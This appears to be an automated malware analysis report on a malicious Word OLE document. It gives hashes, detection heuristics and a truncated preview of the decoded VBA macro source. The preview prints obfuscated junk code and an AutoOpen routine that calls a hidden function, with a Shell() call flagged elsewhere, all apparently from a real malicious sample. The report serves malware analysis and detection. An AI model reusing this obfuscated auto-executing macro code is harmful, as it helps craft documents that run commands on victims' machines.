Office (OLE) malware analysis — malicious · c68daa4e3a8df3c9

MALICIOUS

Office (OLE)

164.0 KB Created: 2018-04-26 19:43:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: cc190d228439405ba1f52a957d0b32d1 SHA-1: d1a46a1eafd03120a141ef87fc9c19f870c079f2 SHA-256: c68daa4e3a8df3c9080890b170d9bbe63ca0ad94ac77f9cbfda098a972397166

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a legacy WordBasic Autoopen macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The large slack space in the OLE structure is also a suspicious indicator. The document body is heavily obfuscated and does not provide clear textual lures.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 167,936 bytes but its declared streams total only 27,331 bytes — 140,605 bytes (84%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54251 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	54251 bytes
SHA-256: `b1b256285fb0a764bcf8edac04808c0de6e74b625dd389d2dda47485d13d527b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "twDPAuaHp" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub kionAJ(cQFwdm) Select Case NmfjO Case 49146 zkVPJM = MrzjhT WGnHfN = Round(2975) KjcfCU = Hex(FovpAk - ChrW(TXrzmP)) HMwTj = jrYjMh Case 21914 ondKTd = CByte(73378) orStc = Log(QQiamQ) End Select End Sub Sub UfLSd(NPMdS) Select Case TijNm Case 36566 mzYEAp = tbIAl vXUISr = Round(81258) YucOz = Hex(IIjDv - ChrW(zdEvb)) dNKlG = rXiwJ Case 52187 vcMNDw = CByte(81514) UHkvF = Log(dvRTZ) End Select Select Case GOcOmn Case 32160 cqMwF = zfnQB kKIFaq = Round(2646) ObMdk = Hex(ohzzbP - ChrW(TYivlp)) FwIBSZ = wFWovm Case 21059 AdjOL = CByte(37438) fpplT = Log(liKoB) End Select Select Case APTLK Case 20937 sbcIfd = LYAMX dnTTMj = Round(11677) KbMAui = Hex(shSYD - ChrW(bqCjJ)) zFNdw = XaMwz Case 99032 ERhAQI = CByte(71219) JSqioU = Log(CwQmC) End Select End Sub Sub HazzO(XIzwhS) Select Case wwtqlY Case 47112 pmWvJ = HXQfNw zrkCC = Round(46629) mLWJP = Hex(WTJFiO - ChrW(KRnaCE)) PkhQUV = AEJnjz Case 20376 dPNfPa = CByte(76519) KAwSv = Log(DJzzkw) End Select Select Case iGouH Case 41147 zSvOT = oYMXpN WWPVCs = Round(39480) zomPM = Hex(zJYlI - ChrW(YOsFj)) LrfwcI = WfHrT Case 83085 AOAiI = CByte(98576) KpOom = Log(IDHiJl) End Select End Sub Sub Autoopen() On Error Resume Next Select Case jcVCL Case 57981 qtrSFt = DKOOwk ACQIpa = Round(26556) Ydhhn = Hex(YtwSiG - ChrW(Rzwjs)) EstPMB = jZEtV Case 6392 WVOkXG = CByte(22587) RPwSib = Log(FUZzmI) End Select cYusHHlWWjvf (iNUfcB + RYYOECYVM + oEwbbu) Select Case jLLmcZ Case 52032 TuXkzU = UYQWwq QriKh = Round(55107) zqCjm = Hex(IOLKj - ChrW(BtZIrD)) EkYKFw = ivTIR Case 84295 SUDUDK = CByte(97843) FMFmwo = Log(qjmGD) End Select End Sub Sub bbfzi(nMvDtr) Select Case jYWno Case 87068 ciLFSB = aFjWL artXXU = Round(58536) PKJMu = Hex(FiUvzN - ChrW(uwPai)) OMHLhh = asfwQ Case 37651 TNTBt = CByte(45806) MsloY = Log(Ofudzs) End Select Select Case QwHzci Case 82886 MDVid = FjdNhG BUWWIk = Round(79143) wBBXfw = Hex(GTZOj - ChrW(AoPJuz)) wRQPm = OdkdT Case 89217 ZOBTH = CByte(96927) laJoSa = Log(BjGMOk) End Select Select Case wjlllS Case 69765 VqFUiM = mwCwzX IcwMY = Round(25480) iQFJVc = Hex(QhVjPt - ChrW(Siwvc)) tKJSk = YYJpZ Case 87262 trZAK = CByte(17860) DWOhPk = Log(TptwQw) End Select End Sub Sub ETGnZM(JHswm) Select Case AMshol Case 86397 WwcCz = EjPqIz pYSNk = Round(93625) uPVkcs = Hex(GwMKfD - ChrW(hWilZh)) asCopS = oZUDp Case 27104 HbsZH = CByte(4125) mDjdtn = Log(BocKP) End Select End Sub Attribute VB_Name = "XtJfLIsvCz" Sub ppnwciwoB() On Error Resume Next Select Case occKfz Case 54575 JkpLP = CBKYjw Xtklh = Round(19497) rpCsTl = Hex(QhVjLQ - ChrW(tMaiaz)) ... (truncated)

SHA-256: b1b256285fb0a764bcf8edac04808c0de6e74b625dd389d2dda47485d13d527b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "twDPAuaHp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub kionAJ(cQFwdm)
Select Case NmfjO
         Case 49146
            zkVPJM = MrzjhT
            WGnHfN = Round(2975)
            KjcfCU = Hex(FovpAk - ChrW(TXrzmP))
            HMwTj = jrYjMh
         Case 21914
            ondKTd = CByte(73378)
            orStc = Log(QQiamQ)
End Select
End Sub
Sub UfLSd(NPMdS)
Select Case TijNm
         Case 36566
            mzYEAp = tbIAl
            vXUISr = Round(81258)
            YucOz = Hex(IIjDv - ChrW(zdEvb))
            dNKlG = rXiwJ
         Case 52187
            vcMNDw = CByte(81514)
            UHkvF = Log(dvRTZ)
End Select
Select Case GOcOmn
         Case 32160
            cqMwF = zfnQB
            kKIFaq = Round(2646)
            ObMdk = Hex(ohzzbP - ChrW(TYivlp))
            FwIBSZ = wFWovm
         Case 21059
            AdjOL = CByte(37438)
            fpplT = Log(liKoB)
End Select
Select Case APTLK
         Case 20937
            sbcIfd = LYAMX
            dnTTMj = Round(11677)
            KbMAui = Hex(shSYD - ChrW(bqCjJ))
            zFNdw = XaMwz
         Case 99032
            ERhAQI = CByte(71219)
            JSqioU = Log(CwQmC)
End Select
End Sub
Sub HazzO(XIzwhS)
Select Case wwtqlY
         Case 47112
            pmWvJ = HXQfNw
            zrkCC = Round(46629)
            mLWJP = Hex(WTJFiO - ChrW(KRnaCE))
            PkhQUV = AEJnjz
         Case 20376
            dPNfPa = CByte(76519)
            KAwSv = Log(DJzzkw)
End Select
Select Case iGouH
         Case 41147
            zSvOT = oYMXpN
            WWPVCs = Round(39480)
            zomPM = Hex(zJYlI - ChrW(YOsFj))
            LrfwcI = WfHrT
         Case 83085
            AOAiI = CByte(98576)
            KpOom = Log(IDHiJl)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case jcVCL
         Case 57981
            qtrSFt = DKOOwk
            ACQIpa = Round(26556)
            Ydhhn = Hex(YtwSiG - ChrW(Rzwjs))
            EstPMB = jZEtV
         Case 6392
            WVOkXG = CByte(22587)
            RPwSib = Log(FUZzmI)
End Select
cYusHHlWWjvf (iNUfcB + RYYOECYVM + oEwbbu)
Select Case jLLmcZ
         Case 52032
            TuXkzU = UYQWwq
            QriKh = Round(55107)
            zqCjm = Hex(IOLKj - ChrW(BtZIrD))
            EkYKFw = ivTIR
         Case 84295
            SUDUDK = CByte(97843)
            FMFmwo = Log(qjmGD)
End Select
End Sub
Sub bbfzi(nMvDtr)
Select Case jYWno
         Case 87068
            ciLFSB = aFjWL
            artXXU = Round(58536)
            PKJMu = Hex(FiUvzN - ChrW(uwPai))
            OMHLhh = asfwQ
         Case 37651
            TNTBt = CByte(45806)
            MsloY = Log(Ofudzs)
End Select
Select Case QwHzci
         Case 82886
            MDVid = FjdNhG
            BUWWIk = Round(79143)
            wBBXfw = Hex(GTZOj - ChrW(AoPJuz))
            wRQPm = OdkdT
         Case 89217
            ZOBTH = CByte(96927)
            laJoSa = Log(BjGMOk)
End Select
Select Case wjlllS
         Case 69765
            VqFUiM = mwCwzX
            IcwMY = Round(25480)
            iQFJVc = Hex(QhVjPt - ChrW(Siwvc))
            tKJSk = YYJpZ
         Case 87262
            trZAK = CByte(17860)
            DWOhPk = Log(TptwQw)
End Select
End Sub
Sub ETGnZM(JHswm)
Select Case AMshol
         Case 86397
            WwcCz = EjPqIz
            pYSNk = Round(93625)
            uPVkcs = Hex(GwMKfD - ChrW(hWilZh))
            asCopS = oZUDp
         Case 27104
            HbsZH = CByte(4125)
            mDjdtn = Log(BocKP)
End Select
End Sub

Attribute VB_Name = "XtJfLIsvCz"
Sub ppnwciwoB()
On Error Resume Next
Select Case occKfz
         Case 54575
            JkpLP = CBKYjw
            Xtklh = Round(19497)
            rpCsTl = Hex(QhVjLQ - ChrW(tMaiaz))
         
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.